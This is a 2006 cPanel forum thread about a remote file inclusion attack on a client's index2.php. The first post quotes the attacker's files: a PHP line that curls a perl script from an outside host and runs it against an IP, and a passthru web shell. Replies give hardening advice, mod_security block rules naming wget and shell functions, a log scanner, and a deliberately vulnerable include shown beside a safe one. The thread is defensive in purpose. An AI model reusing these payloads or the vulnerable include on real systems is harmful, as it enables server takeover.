The Community Forums

Interact with an entire community of cPanel & WHM users!

Help, hacker uploading files /tmp with external PHP code

Discussion in 'General Discussion' started by jeroman8, May 3, 2006.

  1. jeroman8

    Hi!

    A hacker is uploading shell scripts to /tmp on one server through a client's php script.
    The way he is doing this is going to my client's index2.php file and then adding a command in the end so it will query/go to a file placed on another server.
    This file is called m.gif but it's not an image, it's php commands in the file.
    You can probably see it live by going to the urls in log below.

    Anyway - any idea on how to stop this ?
    Disable a function in PHP maybe but hopefully none that will affect other clients.
    Or a mod_sec rule maybe.
    I have blocked his IP of course as well as the server the php commands are on.


    m.gif=

    <?
    system("cd /tmp;curl -o cb maka.home.ro/cb;perl cb 140.128.101.1 80");
    ?>

    pass.gif=

    <?
    passthru($_GET['cmd']);
    ?>

    /usr/local/apache/domlogs/xxx.domain.com:193.231.139.27 - - [03/May/2006:07:07:24 +0200] "GET /index2.php?title=PageTitle&page=http://maka.home.ro/m.gif? HTTP/1.1" 200 3478 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    /usr/local/apache/domlogs/xxx.domain.com:193.231.139.27 - - [03/May/2006:07:07:24 +0200] "GET /gfx/5x5.gif HTTP/1.1" 404 - "http://xxx.domain.com/index2.php?title=PageTitle&page=http://maka.home.ro/m.gif?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows
     
  2. claudio

    Most of these files would be empty or not harmful if you disable = "system, exec" in your php.ini; also set safe mode = on (you can disable some of the safe mode individually in your httpd.conf if some customers require it)

    I wrote a small perl script that I use as a cron every 10 minutes looking for strange files in my /tmp

    then by the time I can grep all .php in domlogs and then execute some of the pages in order to discover which of them is causing the file injection or jamming it on /tmp

    good luck ; )

    Claudio
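The domlog sweep claudio describes, as an added example that is not code from the thread: it parses Apache combined-format lines (the format quoted in the first post, with or without a "filename:" prefix from grep) and reports only query parameters whose value is itself a URL, which is what an unchecked include() or fopen() would fetch. The log lines and hosts are constructed.

```php
<?php
// Added example: find requests where a query parameter's value is a URL
// (the remote-include signature) without flagging every line that merely
// contains the text "http". Log lines below are constructed; hosts are
// placeholders. IPv4 client addresses only.

function rfi_hits_in_line(string $line): array
{
    // Optional "path:" prefix (grep output across domlogs), then client IP,
    // identd, user, [timestamp], "METHOD target HTTP/x.y".
    $re = '/^(?:[^\s:]+:)?(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/';
    if (!preg_match($re, $line, $m)) {
        return [];
    }
    [, $ip, $when, $target] = $m;
    $query = parse_url($target, PHP_URL_QUERY);   // text after the first "?"
    if (!is_string($query)) {
        return [];
    }
    parse_str($query, $params);
    $hits = [];
    foreach ($params as $name => $value) {
        // Only values that begin with a scheme count; "http" in a search term
        // or in the referer column is not an inclusion attempt.
        if (is_string($value) && preg_match('#^(?:https?|ftp)://#i', $value)) {
            $hits[] = ['ip' => $ip, 'time' => $when, 'param' => $name, 'value' => $value];
        }
    }
    return $hits;
}

function scan_log(array $lines): array
{
    $all = [];
    foreach ($lines as $line) {
        foreach (rfi_hits_in_line($line) as $hit) {
            $all[] = $hit;
        }
    }
    return $all;
}

// Constructed sample: lines 1 and 4 are hits, 2 and 3 are ordinary traffic.
$sample = [
    '203.0.113.5 - - [03/May/2006:07:07:24 +0200] "GET /index2.php?title=PageTitle&page=http://attacker.invalid/m.gif? HTTP/1.1" 200 3478 "-" "Mozilla/4.0"',
    '198.51.100.9 - - [03/May/2006:07:08:01 +0200] "GET /index2.php?page=about HTTP/1.1" 200 2100 "-" "Mozilla/4.0"',
    '198.51.100.9 - - [03/May/2006:07:09:10 +0200] "GET /search.php?q=apache+httpd+tuning HTTP/1.1" 200 900 "http://www.example.com/" "Mozilla/4.0"',
    '/usr/local/apache/domlogs/xxx.example.com:203.0.113.5 - - [03/May/2006:07:10:02 +0200] "GET /index2.php?page=ftp://attacker.invalid/x.txt HTTP/1.1" 404 - "-" "curl/7.15"',
];
foreach (scan_log($sample) as $h) {
    printf("%s %s %s=%s\n", $h['time'], $h['ip'], $h['param'], $h['value']);
}
```

Run it over real domlogs with `php scan.php < /usr/local/apache/domlogs/example.com` after swapping the sample array for `file('php://stdin')`; the hits give the client IP and the script to look at.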
     
  3. nickp666

    mod_security and a good rule set should stop most of those type of attacks, catches a lot on one of my boxes, also mounting /tmp noexec would be a good idea, this has been discussed many times on this board so just do a search
     
  4. jackie46

    Really, care to enlighten all of us as to how you would disable safe mode on an individual basis?
     
  5. mOdY

    nice thingy, would be nice if you shared it with us. :cool:
     
  6. HostMerit

    Get mod_security and a good ruleset, and use this code:

    SecFilter "page=http"

    The problem is poorly written PHP code that just fopen's a page / URL and doesn't check / use an array to grab from.
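The code pattern HostMerit describes, shown as an added example rather than code from the thread or from the affected site: a hypothetical index2.php that includes whatever `page=` names, next to the allowlisted version that only accepts a key into a fixed map.

```php
<?php
// Added example: the include pattern behind the attack in this thread
// (a hypothetical index2.php) beside an allowlisted rewrite.

// VULNERABLE: the request supplies the path. With allow_url_fopen=On,
// page=http://attacker.invalid/m.gif? fetches and executes remote PHP
// (the trailing "?" turns the appended ".php" into a harmless query string).
// With URLs blocked, page=../../../../tmp/cb would still include a local file.
function render_page_vulnerable(array $get): void
{
    include $get['page'] . '.php';
}

// HARDENED: the request supplies only a key into a fixed map. The client's
// string is never used as a path, so neither URLs nor "../" reach include().
function page_map(): array
{
    return [
        'home'    => 'pages/home.php',
        'about'   => 'pages/about.php',
        'contact' => 'pages/contact.php',
    ];
}

function resolve_page(array $get): ?string
{
    $key = $get['page'] ?? 'home';
    if (!is_string($key) || !array_key_exists($key, page_map())) {
        return null;   // unknown key: refuse, never fall back to the raw input
    }
    return __DIR__ . '/' . page_map()[$key];
}

function render_page(array $get): void
{
    $path = resolve_page($get);
    if ($path === null) {
        http_response_code(404);
        echo "Unknown page\n";
        return;
    }
    include $path;
}

// Constructed requests, run from the CLI: only the first one resolves.
foreach (['about', 'http://attacker.invalid/m.gif?', '../../../../tmp/cb'] as $p) {
    printf("%-32s => %s\n", $p, resolve_page(['page' => $p]) ?? 'rejected');
}
```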
     
  7. destr0yr

    Upgrading your PHP CMS/blog/forum/whatever would be the ultimate solution. index2.php looks mambo-ish. make sure your client is running the most current version - go so far as to disable their site until they do upgrade. Security should be as large an issue for them as it is for you (IMHO).

    As for mod_security, use it, love it, embrace it, be one with it.

    Current ruleset that works for me:
    Code:
    # WEB-ATTACKS wget command attempt
    SecFilterSelective THE_REQUEST "wget "
    
    # WEB-ATTACKS uname -a command attempt
    SecFilterSelective THE_REQUEST "uname -a"
    
    # WEB-ATTACKS .htgroup access
    SecFilterSelective THE_REQUEST "\.htgroup"
    
    # WEB-ATTACKS .htaccess access
    SecFilterSelective THE_REQUEST "\.htaccess"
    
    # WEB-CLIENT Javascript URL host spoofing attempt
    SecFilter "javascript\://"
    
    # WEB-MISC cross site scripting \(img src=javascript\) attempt
    SecFilter "img src=javascript"
    
    # WEB-MISC cd..
    SecFilterSelective THE_REQUEST "cd\.\."
    
    # WEB-MISC ///cgi-bin access
    SecFilterSelective THE_REQUEST "///cgi-bin"
    
    # WEB-MISC /cgi-bin/// access
    SecFilterSelective THE_REQUEST "/cgi-bin///"
    
    # WEB-MISC /~root access
    SecFilterSelective THE_REQUEST "/~root"
    
    # WEB-MISC /~ftp access
    SecFilterSelective THE_REQUEST "/~ftp"
    
    # WEB-MISC htgrep attempt
    SecFilterSelective THE_REQUEST "/htgrep" chain
    SecFilter "hdr=/"
    
    # WEB-MISC htgrep access
    SecFilterSelective THE_REQUEST "/htgrep" log,pass
    
    # WEB-MISC .history access
    SecFilterSelective THE_REQUEST "/\.history"
    
    # WEB-MISC .bash_history access
    SecFilterSelective THE_REQUEST "/\.bash_history"
    
    # WEB-MISC /~nobody access
    SecFilterSelective THE_REQUEST "/~nobody"
    
    # WEB-PHP PHP-Wiki cross site scripting attempt
    SecFilterSelective THE_REQUEST "<script"
    
    # WEB-PHP strings overflow
    SecFilterSelective THE_REQUEST "\?STRENGUR"
    
    # WEB-PHP PHPLIB remote command attempt
    SecFilter "_PHPLIB\[libdir\]"
    
    #More PHPBB worms
    SecFilterSelective REQUEST_URI "/viewtopic\.php\?" chain
    SecFilterSelective ARGS "(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(([0-9a-fA-Fx]{1,3})\)" 
    
     
  8. Nick A

    Hi, have you run /scripts/securetmp before?
     
  9. HostMerit

    Securetmp wouldn't help, as it's running a perl script.

    You can try chmod 750 /usr/bin/wget and also chmod 750 /usr/bin/curl

    As curl is being used to download the item. Many different ways to secure against this attack.
     
  10. jeroman8

    Thanks guys for your help in this matter!

    Upgrading the script is not easy since it's not a public script.
    noexec/securetmp for temp is of course already done but that doesn't help, never did.
    I already use almost all HostMerit's mod_sec rules but blocking "http" will block all "good" requests also and is too much on this server since many use external images, include pages etc with php. Of course security should come first but there's a client/money issue also.
    chmod 750 curl and wget is the same thing as removing the functions for the clients - many use it.

    However disabling "system" seems to fix this issue with this script !!

    I also have a script checking /tmp and any other catalog I like.
    I set what it should look for and not look for and where and then it emails whenever
    for example a "hack.pl" and "bc.tar"....is being created in /tmp.

    You can find it and other good scripts here:
    http://forums.cpanel.net/showthread.php?t=25672&highlight=PWS+monitor
     
    #10 jeroman8, May 13, 2006
    Last edited: May 13, 2006
  11. webicom

    Try to set allow_url_fopen = Off. You can find that in php.ini file.

    Regards, Erik
     
  12. rogcan

    How do you add that ruleset for mod_security by the way ??

    Can I get a step by step instruction for that please as I would like to use yours destr0yr :)
     
  13. ramprage

    destr0yr

    The ruleset destr0yr is using looks like the default for mod_security and won't help much.

    You need to login by shell and have the ruleset edited then restart apache. If you have more questions about this PM me.
     